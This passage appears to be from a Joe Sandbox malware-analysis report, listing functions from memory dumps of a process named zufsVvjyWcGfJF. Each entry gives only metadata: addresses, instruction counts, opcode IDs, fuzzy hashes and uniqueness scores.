                                                  • Opcode Fuzzy Hash: fcfea6a5e75daf1e8873f813545466003af70597f2617f527dae143c64571cb6
                                                  • Instruction Fuzzy Hash: E0110770E1922D8FEB68DF85C8A47EDB6B2BF54304F1140B9D05DA6292CB785A84CF11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB3363 Relevance: .4, Instructions: 450COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4815b2b2a1af6e2927f84bf4af37ab97ff5b2458f1bacd9c485fff616da8fc74
                                                  • Instruction ID: 6459daaca57bc5d942a94286f82e470b23fc9bbbed75157c70399361e983ba13
                                                  • Opcode Fuzzy Hash: 4815b2b2a1af6e2927f84bf4af37ab97ff5b2458f1bacd9c485fff616da8fc74
                                                  • Instruction Fuzzy Hash: 0F119321A0E69E4EE752AB6488785A67BF0BF16300F0545BBD068C71B3DA74A5048B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAD8C9 Relevance: .4, Instructions: 394COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7c28d16cbd6a8abdae561f1249ae4b4f48612801c85d48c7a425bf502a48b94c
                                                  • Instruction ID: fb725645701d6e4b51c497682bbc1edb911a6ae553eff1064e7734fa9566b652
                                                  • Opcode Fuzzy Hash: 7c28d16cbd6a8abdae561f1249ae4b4f48612801c85d48c7a425bf502a48b94c
                                                  • Instruction Fuzzy Hash: A9E15D71E19A5D8FEBA8DF98C8A47ACB7A2FF58304F4441B9D04DD72E2CA746941CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA1728 Relevance: .3, Instructions: 284COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cd37781b6063a7acea0b35451ea725162613a236efd01baac29dbc54001da2d4
                                                  • Instruction ID: be1aea42073c7d9ca84ae22145f39e94853d46ebd51c7ccea4af7b50b093fc08
                                                  • Opcode Fuzzy Hash: cd37781b6063a7acea0b35451ea725162613a236efd01baac29dbc54001da2d4
                                                  • Instruction Fuzzy Hash: E491F131B1DA894FDB68DF5888615B977E3FFAA300B15017AE45DC72A2DE31AD02C780
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB39FA Relevance: .2, Instructions: 211COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 314b855709e3397ba6e935d05a779503ac42c0119c4a868f4a169d3ca6631ca9
                                                  • Instruction ID: cc8e91b59d18fe8852f29d9889e55b97974257ed53cbb01e80b15e75ccacec31
                                                  • Opcode Fuzzy Hash: 314b855709e3397ba6e935d05a779503ac42c0119c4a868f4a169d3ca6631ca9
                                                  • Instruction Fuzzy Hash: 1D51362370DA794BD724BBBCBC645EABFE0EF55376B0805BBD299CA093D9506444CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB294A Relevance: .2, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8fbdb75790aeb3dbe0c1300a33dffd3d86d36f27c5da5d8ecea5704f1f862b61
                                                  • Instruction ID: 15e3604dae3871b6d3fa0eab944839c7fa5d5893029aa33abd8eb772cdeda4e8
                                                  • Opcode Fuzzy Hash: 8fbdb75790aeb3dbe0c1300a33dffd3d86d36f27c5da5d8ecea5704f1f862b61
                                                  • Instruction Fuzzy Hash: 2D81A870E1961D8EEBA4EF98C855BECB7B1FF58301F1141AAD01DE3292DE746A818B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAC76D Relevance: .2, Instructions: 181COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a434ce24fa25f87595ab118c80087c251b9a7a481033c6d68d5e1c886f0709f
                                                  • Instruction ID: 5c729dd1e02c9845565cbb7ba7c9f89dfdbcd22989f8f170474bcf3eae6fba18
                                                  • Opcode Fuzzy Hash: 7a434ce24fa25f87595ab118c80087c251b9a7a481033c6d68d5e1c886f0709f
                                                  • Instruction Fuzzy Hash: 64511527B0D51A8AF725BBACBC610FCB754EF5833AB050177E51DC90E7EE6C214582A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB28C1 Relevance: .2, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bddefb29bb235ff3a2fa80710e3c1a9e926fe2f04daa8db2fba76f9df17b59ff
                                                  • Instruction ID: c417b41a38822a99d6a2e11ca110edea03b70777412d546e1c73d79088e6eb39
                                                  • Opcode Fuzzy Hash: bddefb29bb235ff3a2fa80710e3c1a9e926fe2f04daa8db2fba76f9df17b59ff
                                                  • Instruction Fuzzy Hash: 8251CC70E1961D8FEBA4EF94C8657ADBBB1FB59300F5141BAC00DE3291DE786A84CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA1CFD Relevance: .2, Instructions: 172COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 191a13426a081a6f048d857c168c6e278d043790446660c03cdcd3e2a5111528
                                                  • Instruction ID: 6197bca9c8102cae5b393a870fd9ac93657312358cd3cbbc4c103eafe9af527f
                                                  • Opcode Fuzzy Hash: 191a13426a081a6f048d857c168c6e278d043790446660c03cdcd3e2a5111528
                                                  • Instruction Fuzzy Hash: A3510130B18B894FCB5CDF1888645BA77E2FFA9300B15457EE45AC7295DE34E802CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA3145 Relevance: .1, Instructions: 147COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7054d8bb09a0c6a832737cd65a398aa1020d4513f80318e8b0ef988388979755
                                                  • Instruction ID: cad6ef5f4699d53de1776c821810da67f66bd79c565cfe5eead9134287ca76f5
                                                  • Opcode Fuzzy Hash: 7054d8bb09a0c6a832737cd65a398aa1020d4513f80318e8b0ef988388979755
                                                  • Instruction Fuzzy Hash: 43513C70E1A60E8FEB64DB98C4646ECBBF2FF58300F51417AD409E72A1DB7869448B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA2115 Relevance: .1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3eda5669524a900980ae14b526b6b6a5879fde3261a91f5a5cad38fab1bee1e
                                                  • Instruction ID: c563dd1a73acb941ef10732e4ae1a989919b196b4860c11fc330f0db187e9818
                                                  • Opcode Fuzzy Hash: d3eda5669524a900980ae14b526b6b6a5879fde3261a91f5a5cad38fab1bee1e
                                                  • Instruction Fuzzy Hash: 50414831B0E74E0FE765DBB884655B87BD1EF86310B0601FBE44CC71E2DE68A9418351
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAAD78 Relevance: .1, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd30a7f5e7f34b872e4916e750b0ab72ac2963e93326eb421c4f83170171aca0
                                                  • Instruction ID: a20d7a86ad68760e82606aedf8fa0d4b919dbcce551841654ee2feb1ec490a52
                                                  • Opcode Fuzzy Hash: dd30a7f5e7f34b872e4916e750b0ab72ac2963e93326eb421c4f83170171aca0
                                                  • Instruction Fuzzy Hash: 17412A61F0FA9F4FE7229BB4C8691E87BE1FF25350F0945BAC098870A2EE6465048361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAABC49 Relevance: .1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ba5b637cb9f800ce5085e4dccaea6f4b578e45b1b947feaea472af7c83bbce98
                                                  • Instruction ID: 55c061ddba28bbf716f42de70129359ac9078b32ce71a98032b03fb78d824c1f
                                                  • Opcode Fuzzy Hash: ba5b637cb9f800ce5085e4dccaea6f4b578e45b1b947feaea472af7c83bbce98
                                                  • Instruction Fuzzy Hash: DD512E70E0960D8FDB68DF94C4A46EDBBF2EF19301F51003AD409E72A1DB786A44CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA364E Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2d577a8f6c3fc471b3acf2a14dd309d0fd06056d224763cb4d328fee727255f
                                                  • Instruction ID: f3cbe0e6fd7d02552d050b0788d067f212f59233344cd758533f5c3985cab449
                                                  • Opcode Fuzzy Hash: b2d577a8f6c3fc471b3acf2a14dd309d0fd06056d224763cb4d328fee727255f
                                                  • Instruction Fuzzy Hash: 7C417171A1994E8FE798DF9888257A97BE2EB99354F90427ED00DC72DACBF418018B41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA1DA3 Relevance: .1, Instructions: 118COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70310760b41c2ecf3127921ce2a93172c8b4a0e7751a5c0d9a960ace09ce34f2
                                                  • Instruction ID: b8c00d063958b78f20724eff3f703cf1af73e58992b3199b5f0d01bf39a01501
                                                  • Opcode Fuzzy Hash: 70310760b41c2ecf3127921ce2a93172c8b4a0e7751a5c0d9a960ace09ce34f2
                                                  • Instruction Fuzzy Hash: 10315E30718A498FDB5CDF4888A55BA73E2FFD8715B10463EE45AC7295CE30E812CB81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAAD88 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8b6c3fa7449084371cae8c2e8e8f5199164bc14c523242b70513eb45181c773
                                                  • Instruction ID: 7f9ca0c616e26dea10a1679be00ef469718e91b512ebe652bbb15673549fa485
                                                  • Opcode Fuzzy Hash: c8b6c3fa7449084371cae8c2e8e8f5199164bc14c523242b70513eb45181c773
                                                  • Instruction Fuzzy Hash: A7313862F0FA9F4BF7769BF488291E47BD1FF21250F0945BAC0A8870E3ED58650583A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAC154 Relevance: .1, Instructions: 112COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54e0b9124d9d6231549596ddec75ab5394fa4e1cc9af466cb66aff68eb220f81
                                                  • Instruction ID: 746f8920970d2b583e7609f4c9e561e2efd6274bfebd32a88abc41b0638e3dcb
                                                  • Opcode Fuzzy Hash: 54e0b9124d9d6231549596ddec75ab5394fa4e1cc9af466cb66aff68eb220f81
                                                  • Instruction Fuzzy Hash: 3A310870F1991D8FEBA4EB98D8A5AACB7F6FF58300F51013AD04DE3291DE6869418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAC7D3 Relevance: .1, Instructions: 108COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49c740f74d102b6a59cd589819cedb2afb7b16e53ac160df3a98d6415220f6d9
                                                  • Instruction ID: 314b18e7752457dcf94d9280178b87e46d0cae2935a7d901f7155eca2ba34989
                                                  • Opcode Fuzzy Hash: 49c740f74d102b6a59cd589819cedb2afb7b16e53ac160df3a98d6415220f6d9
                                                  • Instruction Fuzzy Hash: 03310422B0D15B4AF726BBACAC614FC7754FF5933AF05017BE51D8A0E3EE6C254082A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB5264 Relevance: .1, Instructions: 102COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 40f7c964b791ca8a0604ffa4b9b087be036210bab791fb50229c2f27d2dfe3b2
                                                  • Instruction ID: 74de18d054f561079a9ed2329fb6565cfc175408e347f247e223b568bacf64ef
                                                  • Opcode Fuzzy Hash: 40f7c964b791ca8a0604ffa4b9b087be036210bab791fb50229c2f27d2dfe3b2
                                                  • Instruction Fuzzy Hash: A731F171D19A5D8FEF94EF98D8A9AACB7F1FF58300F00416AD00DE7295DA7468818B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAAC1CC Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAAA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAAA000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baaa000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8aab07e3e1dfcbce5d104debc05a0d9bd56b65753b72e2642e0e587cf0c3f813
                                                  • Instruction ID: 08d08235c06aef177fb7f22dd526e1315ae5af48ddcb2e955c8728104d9fafb3
                                                  • Opcode Fuzzy Hash: 8aab07e3e1dfcbce5d104debc05a0d9bd56b65753b72e2642e0e587cf0c3f813
                                                  • Instruction Fuzzy Hash: 15210F70F0991D8FEBA4EBDCC8656ADB7F6FF59300F51012AD04DE3292DE6459418B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB75A5 Relevance: .1, Instructions: 91COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5c895928e0e942ecf5e09df5d456270a0336356082f16d1e7b4f75e4a96054b3
                                                  • Instruction ID: 0e1ea84edc907eeee6421445ea3d748de906cfa4ff6da2429ee1e9e57804cace
                                                  • Opcode Fuzzy Hash: 5c895928e0e942ecf5e09df5d456270a0336356082f16d1e7b4f75e4a96054b3
                                                  • Instruction Fuzzy Hash: FF31F230B0A61E8FEB65EB68C468AFD37E1FF58300F11057AC029D71E1DEB4A9408B40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB6CA1 Relevance: .1, Instructions: 89COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66cf1f0643e42a7854cefc8705fd0ac5af7afe90da1bbd52b3eeb8619e6bd2ac
                                                  • Instruction ID: 773322a2280f35356d38e966e61cc4c1af96c0677f0206bae07cc328498aee57
                                                  • Opcode Fuzzy Hash: 66cf1f0643e42a7854cefc8705fd0ac5af7afe90da1bbd52b3eeb8619e6bd2ac
                                                  • Instruction Fuzzy Hash: 9121C130A0AA0E8FEBA8EF68C4656BE77A0FF19305F00457AD42DC31A6CF75A540CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB6E7D Relevance: .1, Instructions: 87COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c3f54d7f24f3b86d9a9bea7110fa45ed2b118424d437e01e40072825d1c29438
                                                  • Instruction ID: f73f2399ff59cd9069206a6d0d6f13ffe2428ee541b98255861c8b9636119741
                                                  • Opcode Fuzzy Hash: c3f54d7f24f3b86d9a9bea7110fa45ed2b118424d437e01e40072825d1c29438
                                                  • Instruction Fuzzy Hash: 9F21E430A0AA4E4FEB69DF68C4B51B9B7A1FF59304F0640BED42DC60E2DE76A504CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA3211 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a04b57f5879803bbeb81039727ce6d0afc5ccd9f4db2c467ad2f22f049f19bf1
                                                  • Instruction ID: 6da7092e7396db51108cfb9b1213568ef799be82b53a89b8be60e151e6ad6394
                                                  • Opcode Fuzzy Hash: a04b57f5879803bbeb81039727ce6d0afc5ccd9f4db2c467ad2f22f049f19bf1
                                                  • Instruction Fuzzy Hash: BD21EF71E0961D8FEB54DBD8C4A46ECB7F2FF68311F11417AD009E72A5CA786944CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA33E1 Relevance: .1, Instructions: 78COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4d0f579a3882614fffd97038dd648ef5cb8797223af89778d672e93519febde
                                                  • Instruction ID: bf4d6a3054c468fd9548bf9017be0ea1495223d6a014b67a2b38c3c70d14bdd3
                                                  • Opcode Fuzzy Hash: a4d0f579a3882614fffd97038dd648ef5cb8797223af89778d672e93519febde
                                                  • Instruction Fuzzy Hash: 7B216A30A0A64E8FEB69EBA4C8695BA77E1FF18305F0149BAD41DC71A5DF74A600CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA3465 Relevance: .1, Instructions: 77COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0d1ae6a6354fb32d878f1fb5485322b09da9c54594de9147821c1e526e4700a1
                                                  • Instruction ID: 9f1246f69e422865205a83fb00f46e24f0061b9227c70051347cf5e874edfa36
                                                  • Opcode Fuzzy Hash: 0d1ae6a6354fb32d878f1fb5485322b09da9c54594de9147821c1e526e4700a1
                                                  • Instruction Fuzzy Hash: 0F218C30A0A64E8FEB6AEFA4C4655B977E1FF18305F1144BAD41EC71A1DB75A640CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA23A3 Relevance: .1, Instructions: 75COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 66d7e3f32bf1fb1a6e54b7f4f586f7ccd7b487b009247ceee6aac8ed5ad806c3
                                                  • Instruction ID: a75eeefa77f6b142c2911e4b773d5f8b5344af7b6f216a5f027a5ae3ba91c818
                                                  • Opcode Fuzzy Hash: 66d7e3f32bf1fb1a6e54b7f4f586f7ccd7b487b009247ceee6aac8ed5ad806c3
                                                  • Instruction Fuzzy Hash: E0213D30E0A61E8BEB74EBC0C9207F8B3B6FF55300F115179D05E961A1DEB86B548B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAB7B09 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB1000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9bab1000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27af6d7b50f58200f0444bf06185c07e1f2b3a2ee82bbccea8b7e8f8396e73e4
                                                  • Instruction ID: 98b83ec1a0ec5719d4f29867b8d6cac50a92af2055ecb833752c42e4d07f6c63
                                                  • Opcode Fuzzy Hash: 27af6d7b50f58200f0444bf06185c07e1f2b3a2ee82bbccea8b7e8f8396e73e4
                                                  • Instruction Fuzzy Hash: 9621CF30A0A65E8FDB59EB64C8B55BA77A0FF15304F1104BED42EC70E6DEB5AA10CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00007FFD9BAA3340 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.1904456358.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_7ffd9baa0000_zufsVvjyWcGfJF.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 048a733ad1b8a5cc897199ec6f4d0e506a0881c473451049f590b7bef18aa967
                                                  • Instruction ID: 226ffdf295bac5a7655b2ed9b1e5f3020a11b092ec7b29fed99afb2ba666b4b7
                                                  • Opcode Fuzzy Hash: 048a733ad1b8a5cc897199ec6f4d0e506a0881c473451049f590b7bef18aa967
                                                  • Instruction Fuzzy Hash: 6521DF3094E68A8FE752EBB488685E97FF1FF5B310B0604E6D048C70B2DA78A545CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

